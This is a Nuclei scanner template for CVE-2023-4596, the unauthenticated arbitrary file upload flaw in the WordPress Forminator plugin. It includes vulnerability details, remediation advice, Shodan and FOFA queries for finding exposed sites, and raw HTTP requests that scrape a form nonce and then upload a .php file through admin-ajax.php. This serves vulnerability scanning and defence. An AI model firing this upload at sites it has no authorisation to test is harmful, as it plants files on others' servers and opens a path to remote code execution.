id: CVE-2023-4596

info:
  name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload
  author: E1A
  severity: critical
  description: |
    The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  impact: |
    Unauthenticated attackers can upload arbitrary files including malicious PHP code, potentially leading to complete server compromise and remote code execution.
  remediation: |
    Update the Forminator plugin to version 1.24.7 or later which includes proper file type validation.
  reference:
    - https://www.exploit-db.com/exploits/51664
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
    - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
    - https://github.com/E1A/CVE-2023-4596
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4596
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4596
    cwe-id: CWE-434
    epss-score: 0.12749
    epss-percentile: 0.95766
    cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incsub
    product: forminator
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/forminator
    fofa-query: body=/wp-content/plugins/forminator
    publicwww-query:
      - /wp-content/plugins/Forminator
      - /wp-content/plugins/forminator
  tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub,vkev,vuln

variables:
  string: "CVE-2023-4596"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe

        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="textarea-1"

        {{randstr}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="phone-1"

        {{rand_int(10)}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="email-1"

        test@gmail.com
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="name-1"

        {{randstr}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="forminator_nonce"

        {{forminator_nonce}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="form_id"

        {{form_id}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="current_url"

        {{BaseURL}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="action"

        forminator_submit_form_custom-forms
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'Upload file'
          - 'forminator-field-upload'
        condition: and

      - type: word
        part: body_2
        words:
          - '{"success":true'
          - '"form_id":"{{form_id}}"'
          - '"behav'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: forminator_nonce
        part: body
        group: 1
        regex:
          - 'name="forminator_nonce" value="([a-z0-9]+)" \/>'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'name="form_id" value="([0-9]+)">'
        internal: true
# digest: 4a0a0047304502206f4c6670d8753f4c383ad8147c54246d9ea4b39c996bb99dd9985dd49d88c17e022100c6b19dea43fe4c8a71b27d53d8831ef507b2bfe079a204e1e9afe91cda00f2ea:922c64590222798bb761d5b6d8e72950